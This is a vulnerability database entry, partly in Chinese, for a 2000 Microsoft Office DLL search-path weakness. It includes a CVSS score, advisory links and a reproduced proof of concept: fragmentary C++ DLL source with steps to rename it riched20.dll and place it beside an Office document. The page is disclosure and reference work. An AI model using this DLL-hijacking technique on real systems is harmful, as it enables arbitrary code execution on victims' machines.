发布时间 :2000-11-14 00:00:00
修订时间 :2017-10-09 21:29:20

[原文]When a Microsoft Office 2000 document is launched, the directory of that document is first used to locate DLL's such as riched20.dll and msi.dll, which could allow an attacker to execute arbitrary commands by inserting a Trojan Horse DLL into the same directory as the document.

[CNNVD]Microsoft Office命令执行漏洞(CNNVD-200011-047)

        启动Microsoft Office 2000文件时,其目录首先用于DLL的查找如riched20.dll和msi.dll,攻击者可以通过向相同文件目录插入DLL特洛伊木马的方式执行任意命令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BUGTRAQ  20000922 Eudora + riched20.dll affects WinZip v8.0 as well
(UNKNOWN)  NTBUGTRAQ  20000921 Mitigators for possible exploit of Eudora via Guninski #21,2000
(VENDOR_ADVISORY)  WIN2KSEC  20000918 Double clicking on MS Office documents from Windows Explorer may execute arbitrary programs in some cases
(UNKNOWN)  XF  office-dll-execution(5263)

- 漏洞信息

Microsoft Office命令执行漏洞
危急 未知
2000-11-14 00:00:00 2005-05-02 00:00:00
        启动Microsoft Office 2000文件时,其目录首先用于DLL的查找如riched20.dll和msi.dll,攻击者可以通过向相同文件目录插入DLL特洛伊木马的方式执行任意命令。

- 公告与补丁


- 漏洞信息 (20232)

MS Windows 2000/NT 4 DLL Search Path Weakness (EDBID:20232)
windows local
2000-09-18 Verified
0 Georgi Guninski
N/A [点击下载]

When a program executes under Microsoft Windows, it may require additional code stored in DLL library files. These files are dynamically located at run time, and loaded if necessary. A weakness exists in the algorithm used to locate these files.

The search algorithm used to locate DLL files specifies that the current working directory is checked before the System folders. If a trojaned DLL can be inserted into the system in an arbitrary location, and a predictable executable called with the same current working directory, the trojaned DLL may be loaded and executed. This may occur when a data file is accessed through the 'Run' function, or double clicked in Windows Explorer.

This has been reported to occur with the 'riched20.dll' and 'msi.dll' DLL files and some Microsoft Office applications, including WordPad.

This behavior has also been reported for files loaded from UNC shares, or directly from FTP servers. 

// dll1.cpp : Defines the entry point for the DLL application.

#include "stdafx.h"
#include "stdlib.h"

                       DWORD  ul_reason_for_call, 
                       LPVOID lpReserved
   switch( ul_reason_for_call ) 
        case DLL_PROCESS_ATTACH:
         // Initialize once for each new process.
         // Return FALSE to fail DLL load.
			MessageBox(NULL, "Hello world!", "Info", MB_OK);
			MessageBox(NULL, "Shall try to start: C:\\TEST.EXE\n You may need to create it.", "Info", MB_OK);

        case DLL_THREAD_ATTACH:
        // Do thread-specific initialization.
		//	MessageBox(NULL, "DllMain.dll: DLL_THREAD_ATTACH", "Info", MB_OK);

        case DLL_THREAD_DETACH:
         // Do thread-specific cleanup.

        case DLL_PROCESS_DETACH:
         // Perform any necessary cleanup.

    return TRUE;

1) Rename dll1.dll to riched20.dll
2) Place riched20.dll in a directory of your choice
3) Close all Office applications
4) From Windows Explorer double click on an Office document (preferably MS Word document) in the directory containg riched20.dll 		

- 漏洞信息

Microsoft Windows / Office DLL Search Path Weakness
Context Dependent Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Uncoordinated Disclosure

- 漏洞描述

- 时间线

2000-09-18 Unknow
Unknow Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete